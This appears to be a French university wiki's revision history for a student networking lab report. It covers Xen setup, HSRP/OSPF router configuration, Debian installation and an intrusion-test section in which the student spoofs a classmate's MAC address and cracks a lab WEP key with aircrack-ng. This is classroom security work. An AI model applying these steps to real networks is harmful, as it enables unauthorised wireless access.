&amp;lt;h3&amp;gt;Cassage de mot de passe WPA-PSK par force brute&amp;lt;/h3&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt;Installation des systèmes d'exploitation&amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
J'ai créé une machine virtuelle en me connectant sur root@cordouan.insecserv.deule.net&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code :&lt;br /&gt;
xen-create-image --hostname Werewolf --ip 193.48.57.183 --netmask 255.255.255.240 --dir /usr/local/xen&lt;br /&gt;
&lt;br /&gt;
nano /etc/ssh/sshd_config allow root login (without password)-&amp;gt;yes&lt;br /&gt;
apt -get purge network-manager systemd&lt;br /&gt;
init tab ==&amp;gt; 1:??45: ..... tty1 à remplacer par 1:??45: ..... hvc0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Hostname        :  Werewolf&lt;br /&gt;
Distribution    :  jessie&lt;br /&gt;
MAC Address     :  00:16:3E:25:96:A7&lt;br /&gt;
IP Address(es)  :  193.48.57.18&lt;br /&gt;
RSA Fingerprint :  4d:ea:00:cc:51:7f:85:92:ec:2d:c3:4e:f4:81:b1:3e&lt;br /&gt;
Root Password   :  Il ne serait plus secret sinon ;)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A RETENIR :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Pour ouvrir la machine : xl console Werewolf&lt;br /&gt;
Pour la fermer : halt&lt;br /&gt;
Pour rallumer la machiner si éteinte : xl create /etc/xen/Werewolf.cfg&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt;Services Internet&amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
Le nom de domaine que j'ai réservé est : hunt3r.lol&lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt;Réalisation&amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt; Installation de LINUX sur les nouveaux PC HP &amp;lt;/h3&amp;gt;&lt;br /&gt;
J'ai allumé le nouveau PC et j'ai configuré son nom avec le thème Poisson : perche. [http://www.carnets-de-captures.fr/illustrations/proies_perche.jpg]&lt;br /&gt;
&lt;br /&gt;
Ensuite je redémarre le PC avec le mode boot (F9) puis je fais F10. Je vais dans System Configurations. Je change la langue en français puis je vais dans option d'amorçage et je désactive le démarrage sécurisé. Il faut quitter et sauvegarder. Entrer le code 8370 + entrer. Redémarrer et faire F9, puis reboot sur la clé usb sur laquelle on a monté l'image de Debian GNU/Linux 8.2.0 à l'aide de cette commande : &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code :&lt;br /&gt;
root@zabeth09:/tmp# dd if=debian-8.2.0-amd64-netinst.iso of=/dev/sdb&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
On va donc configurer le réseau nous-même.&lt;br /&gt;
Adresse IP : 172.20.106.6&lt;br /&gt;
Mask : 255.255.255.0&lt;br /&gt;
Adresse passerelle : 172.20.106.254&lt;br /&gt;
Adresse des serveurs de noms : 193.48.57.34&lt;br /&gt;
Nom de machine : perche&lt;br /&gt;
Domaine : deule.net&lt;br /&gt;
&lt;br /&gt;
Mot de passe pour superutilisateur : celui de d'habitude pour un root&lt;br /&gt;
Nouvel utilisateur : pifou&lt;br /&gt;
Mot de passe nouvel utilisateur : celui de d'habitude pour pifou&lt;br /&gt;
&lt;br /&gt;
Arrivée au partitionnement :&lt;br /&gt;
&lt;br /&gt;
J'ai cliqué sur manuel puis sur le n°3 qui avait 22 Gb. J'ai partitionné à 8Gb de façon à avoir 8Gb pour Windows ( on s'en fou de lui) et 14.6Gb pour nous. J'ai ensuite cliqué partitionnement assisté et utiliser le plus grand espace disponible. &lt;br /&gt;
Nom du miroir de l'archive Debian : debian.polytech-lille.fr&lt;br /&gt;
Mandataire HTTP : http://proxy.polytech-lille.fr:3128&lt;br /&gt;
Logiciels à installer : Xfce, service SSH  et utilitaies usuels du système (à valider à l'aider de la barre espace)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Ebourre</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G6&amp;diff=23083</id>
		<title>TP sysres IMA2a5 2015/2016 G6</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G6&amp;diff=23083"/>
				<updated>2015-11-20T08:34:02Z</updated>
		
		<summary type="html">&lt;p&gt;Ebourre : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;h1&amp;gt; Projet Systèmes&amp;amp;Réseaux IMA2A5 &amp;lt;/h1&amp;gt;&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
Cet atelier consiste en la réalisation d'une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. Il se décompose en deux parties : tout d'abord une partie à réaliser seul puis d'une réalisation commune. Cette dernière comprend l'installation d'une machine virtuelle Xen, l'implantation d'un auto-commutateur téléphonique logiciel ainsi que la mise en place d'un réseau Wifi et d'un site sécurisés. &amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour ma part, dans un premier temps je m'occuperais de la configuration d'un des deux routeurs permettant la redondance.&lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt; Architecture réseau &amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
Dans ma partie, il me fallait donc réaliser la configuration du routeur n°1 dans le but de créer une redondance. Cette dernière permettra donc dans le cas ou l'un des routeurs d'une des deux salles de TP tombe, les ordinateurs du routeur HS continueront d'avoir accès à internet.&lt;br /&gt;
&lt;br /&gt;
La configuration du routeur consistait à affecter à chacun des réseaux une adresse IP. Voici le tableau reprenant le descriptif des VLAN's.&lt;br /&gt;
&amp;lt;center&amp;gt;&lt;br /&gt;
&amp;lt;table&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;'''N° du VLAN'''&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;'''Nom'''&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;'''Adresse IP'''&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;'''Adresse Routeur 1'''&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;'''Adresse Passerelle'''&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;2&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Puduc&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.100.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.100.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.100.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;3&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Nounours&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.101.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.101.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.101.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;4&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Jeuno&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.102.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.102.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.102.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;5&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Relax&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.103.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.103.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.103.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;6&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;John&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.104.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.104.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.104.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;7&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Loki&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.105.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.105.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.105.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;8&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Papy&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.106.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.106.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.106.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;10&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Hub&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;193.48.57.176/28&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;193.48.57.188&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;193.48.57.190&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;131&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Interco&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;192.168.222.8/29&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;192.168.222.9&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;X&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;br /&gt;
&amp;lt;/center&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Afin de créer la redondance on utilise l'adresse passerelle, cette dernière sera &amp;quot;prise&amp;quot; par le routeur le plus prioritaire. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code sous minicom pour réaliser l'adressage des VLan's: &lt;br /&gt;
&lt;br /&gt;
- en // passage en mode administrateur&lt;br /&gt;
- conf t &lt;br /&gt;
- int vlan2 //modification du vlan2&lt;br /&gt;
- ip address 172.20.100.252 255.255.255.0 // association du l'adresse IP et du mask au vlan2&lt;br /&gt;
- standby 1 ip 172.20.100.254 // adresse de passerelle&lt;br /&gt;
- standby 1 preempt  //Utilisation du protocole HSRP nécessaire à la redondance&lt;br /&gt;
- standby 1 priority 110 // priorité pour la prise de l'adresse passerelle&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code pour affecter un nom à un VLAN: &lt;br /&gt;
&lt;br /&gt;
- conf t &lt;br /&gt;
- vlan8&lt;br /&gt;
- name Papy&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code pour affecter un port (içi pour internet)&lt;br /&gt;
&lt;br /&gt;
- conf t &lt;br /&gt;
- interface GigabitEthernet 0/47 // on agit sur ce port&lt;br /&gt;
- Sitchport mode access&lt;br /&gt;
- switchport access vlan131 // Définition de l'association entre le port et le vlan pour internet&lt;br /&gt;
- no shut&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code pour l'échange automatique des tables de routages :&lt;br /&gt;
&lt;br /&gt;
- Switch(config)#router ospf 1&lt;br /&gt;
-Switch(config-router)#log-adjacency-changes&lt;br /&gt;
-Switch(config-router)#router-id 172.20.100.252&lt;br /&gt;
-Switch(config-router)#log-adjacency-changes   &lt;br /&gt;
-Switch(config-router)#summary-address 172.20.96.0 255.255.240.0&lt;br /&gt;
-Switch(config-router)#summary-address 193.48.57.176 255.255.255.240&lt;br /&gt;
-Switch(config-router)#redistribute connected metric 20 subnets &lt;br /&gt;
-Switch(config-router)#network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour que le routeur de l'école connaîsse toutes ces adresses et vis-versa, on effectue un échange de table de routage par le protocole de routage OSPF. Letric à 20 permettra au routeur de l'école de prendre en priorité ma table de routage à celle de Clément qui lui est à 30. Dès lors que mon routeur ne sera plus en état de foncctionner, le routeur de l'école prendra directement celle de Clément.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt; Tests d'intrusion &amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Intrusion par changement d'adresse MAC&amp;lt;/h3&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Lorsque j'ai récupéré mon EEPC, Marouanne me l'avait configuré pour que je puisse me connecter avec ce dernier sur internet.&lt;br /&gt;
En modifiant le fichier /etc/network/interfaces, je remplace T1 par T2 et le mot de passe 0000000000 en 1111111111. De cette façon je pourrais aller sur internet en passant pas la wifi de Maxime. &lt;br /&gt;
&lt;br /&gt;
RESULTAT : Impossible de me connecter au réseau. En effet mon adresse MAC n'est pas connue de Maxime donc je suis rejeté. &lt;br /&gt;
&lt;br /&gt;
SOLUTION : Usurper l'identité de quelqu'un autorisé. J'ai donc pris par a force l'adresse de Gauthier 00:15:AF:E6:ED:B1&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Avec une simple ligne de code : je change mon adresse MAC !&lt;br /&gt;
- ifconfig wlan0 down&lt;br /&gt;
- ifconfig wlan0 hw ether 00:15:AF:E6:ED:B1  //adresse mac de Gauthier&lt;br /&gt;
- ifconfig wlan0 up&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
MAGNIFIQUE je peux maintenant aller sur internet via la borne wifi de Maxime.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Cassage de clef WEP d'un point d'accès Wifi&amp;lt;/h3&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Cassage de mot de passe WPA-PSK par force brute&amp;lt;/h3&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt;Installation des systèmes d'exploitation&amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
J'ai créé une machine virtuelle en me connectant sur root@cordouan.insecserv.deule.net&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code :&lt;br /&gt;
xen-create-image --hostname Werewolf --ip 193.48.57.183 --netmask 255.255.255.240 --dir /usr/local/xen&lt;br /&gt;
&lt;br /&gt;
nano /etc/ssh/sshd_config allow root login (without password)-&amp;gt;yes&lt;br /&gt;
apt -get purge network-manager systemd&lt;br /&gt;
init tab ==&amp;gt; 1:??45: ..... tty1 à remplacer par 1:??45: ..... hvc0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Hostname        :  Werewolf&lt;br /&gt;
Distribution    :  jessie&lt;br /&gt;
MAC Address     :  00:16:3E:25:96:A7&lt;br /&gt;
IP Address(es)  :  193.48.57.18&lt;br /&gt;
RSA Fingerprint :  4d:ea:00:cc:51:7f:85:92:ec:2d:c3:4e:f4:81:b1:3e&lt;br /&gt;
Root Password   :  Il ne serait plus secret sinon ;)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A RETENIR :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Pour ouvrir la machine : xl console Werewolf&lt;br /&gt;
Pour la fermer : halt&lt;br /&gt;
Pour rallumer la machiner si éteinte : xl create /etc/xen/Werewolf.cfg&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt;Services Internet&amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
Le nom de domaine que j'ai réservé est : hunt3r.lol&lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt;Réalisation&amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt; Installation de LINUX sur les nouveaux PC HP &amp;lt;/h3&amp;gt;&lt;br /&gt;
J'ai allumé le nouveau PC et j'ai configuré son nom avec le thème Poisson : perche. [http://www.carnets-de-captures.fr/illustrations/proies_perche.jpg]&lt;br /&gt;
&lt;br /&gt;
Ensuite je redémarre le PC avec le mode boot (F9) puis je fais F10. Je vais dans System Configurations. Je change la langue en français puis je vais dans option d'amorçage et je désactive le démarrage sécurisé. Il faut quitter et sauvegarder. Entrer le code 8370 + entrer. Redémarrer et faire F9, puis reboot sur la clé usb sur laquelle on a monté l'image de Debian GNU/Linux 8.2.0 à l'aide de cette commande : &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code :&lt;br /&gt;
root@zabeth09:/tmp# dd if=debian-8.2.0-amd64-netinst.iso of=/dev/sdb&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
On va donc configurer le réseau nous-même.&lt;br /&gt;
Adresse IP : 172.20.106.6&lt;br /&gt;
Mask : 255.255.255.0&lt;br /&gt;
Adresse passerelle : 172.20.106.254&lt;br /&gt;
Adresse des serveurs de noms : 193.48.57.34&lt;br /&gt;
Nom de machine : perche&lt;br /&gt;
Domaine : deule.net&lt;br /&gt;
&lt;br /&gt;
Mot de passe pour superutilisateur : celui de d'habitude pour un root&lt;br /&gt;
Nouvel utilisateur : pifou&lt;br /&gt;
Mot de passe nouvel utilisateur : celui de d'habitude pour pifou&lt;br /&gt;
&lt;br /&gt;
Arrivée au partitionnement :&lt;br /&gt;
&lt;br /&gt;
J'ai cliqué sur manuel puis sur le n°3 qui avait 22 Gb. J'ai partitionné à 8Gb de façon à avoir 8Gb pour Windows ( on s'en fou de lui) et 14.6Gb pour nous. J'ai ensuite cliqué partitionnement assisté et utiliser le plus grand espace disponible. &lt;br /&gt;
Nom du miroir de l'archive Debian : debian.polytech-lille.fr&lt;br /&gt;
Mandataire HTTP : http://proxy.polytech-lille.fr:3128&lt;br /&gt;
Logiciels à installer : Xfce, service SSH  et utilitaies usuels du système (à valider à l'aider de la barre espace)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A partir de là Linux est installé sur la machine. Je vais donc passer maintenant au crackage de la clé WEP.&lt;br /&gt;
&lt;br /&gt;
Pour cela j'installe aircrack.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code : &lt;br /&gt;
apt-get install aircrack-ng&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Modification du fichier /etc/apt/sources.list : &lt;br /&gt;
rajout de contrib non-free&lt;br /&gt;
&lt;br /&gt;
Modification du fichier /etc/network/interfaces : &lt;br /&gt;
auto eth0&lt;br /&gt;
iface eth0 inet static &lt;br /&gt;
     address 172.20.106.6&lt;br /&gt;
     netmask 255.255.255.0&lt;br /&gt;
     gateway 172.20.106.254&lt;br /&gt;
&lt;br /&gt;
Modification du fichier /etc/resolv.conf : &lt;br /&gt;
nameserver 193.48.57.34&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code : &lt;br /&gt;
apt-get install firmware-linux-nonfree&lt;br /&gt;
apt-get remove network-manager&lt;br /&gt;
apt-get install broadcom-sta-dkms&lt;br /&gt;
modprobe wl&lt;br /&gt;
modprobe -r b44 b43 b43legacy ssb brcmsmac&lt;br /&gt;
modprobe -r wl&lt;br /&gt;
modprobe wl*dmseg&lt;br /&gt;
dmseg&lt;br /&gt;
ifconfig -a &lt;br /&gt;
reboot&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A partir de là je tape la commande airmon-ng et j'obtiens enfin wlan0, Broadcom et wl - [phy0]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
code :&lt;br /&gt;
airmon -ng start wlan1 ==&amp;gt; cela ne fonctionne pas grâce a dmseg on voit que c'est à cause de fail to load rt2870.bin&lt;br /&gt;
soltion : apt-get install firmware-ralink&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Je stop les deux mon0 et mon1 que j'avais créé : via la commande airmon-ng stop mon1 et mon0&lt;br /&gt;
&lt;br /&gt;
Je ré-ouvre une mon0.&lt;br /&gt;
&lt;br /&gt;
J'utilise la commande airodump-ng mon0 afin voir tous les SSID qui passent en WIFI.&lt;br /&gt;
&lt;br /&gt;
Ma cible étant les cracottes je filtre pour n'avoir qu'elles en selectionnant le channel 5 car elles y sont tous dessus.&lt;br /&gt;
&lt;br /&gt;
Code : airodump-ng mon0 --channel 5. Je ne voit que les cracottes. Je prends la cracotte qui me concerne, c'est à dire la 8. (même numéro de vlan que moi)&lt;br /&gt;
&lt;br /&gt;
code : airodump-ng mon0 --channel 5 --BSSID 04:da:d2:9c:50:57 ainsi je ne vois que la cracotte que je veux.&lt;br /&gt;
&lt;br /&gt;
Maintenant pour copier les données dans un fichier il me suffit de rajouter l'option --w nomDeFichier&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Grâce à la commande aircrack-ng -s *.cap : la clé WEP de la cracotte08 a été cracké : celle-ci est : aa:aa:aa:aa:aa:aa:aa:aa:aa:bb:bb:bb:bb ! &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Ebourre</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G6&amp;diff=22955</id>
		<title>TP sysres IMA2a5 2015/2016 G6</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G6&amp;diff=22955"/>
				<updated>2015-11-13T16:23:44Z</updated>
		
		<summary type="html">&lt;p&gt;Ebourre : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;h1&amp;gt; Projet Systèmes&amp;amp;Réseaux IMA2A5 &amp;lt;/h1&amp;gt;&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
Cet atelier consiste en la réalisation d'une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. Il se décompose en deux parties : tout d'abord une partie à réaliser seul puis d'une réalisation commune. Cette dernière comprend l'installation d'une machine virtuelle Xen, l'implantation d'un auto-commutateur téléphonique logiciel ainsi que la mise en place d'un réseau Wifi et d'un site sécurisés. &amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour ma part, dans un premier temps je m'occuperais de la configuration d'un des deux routeurs permettant la redondance.&lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt; Architecture réseau &amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
Dans ma partie, il me fallait donc réaliser la configuration du routeur n°1 dans le but de créer une redondance. Cette dernière permettra donc dans le cas ou l'un des routeurs d'une des deux salles de TP tombe, les ordinateurs du routeur HS continueront d'avoir accès à internet.&lt;br /&gt;
&lt;br /&gt;
La configuration du routeur consistait à affecter à chacun des réseaux une adresse IP. Voici le tableau reprenant le descriptif des VLAN's.&lt;br /&gt;
&amp;lt;center&amp;gt;&lt;br /&gt;
&amp;lt;table&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;'''N° du VLAN'''&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;'''Nom'''&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;'''Adresse IP'''&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;'''Adresse Routeur 1'''&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;'''Adresse Passerelle'''&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;2&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Puduc&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.100.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.100.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.100.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;3&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Nounours&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.101.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.101.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.101.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;4&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Jeuno&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.102.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.102.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.102.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;5&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Relax&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.103.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.103.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.103.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;6&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;John&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.104.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.104.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.104.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;7&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Loki&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.105.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.105.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.105.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;8&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Papy&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.106.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.106.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.106.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
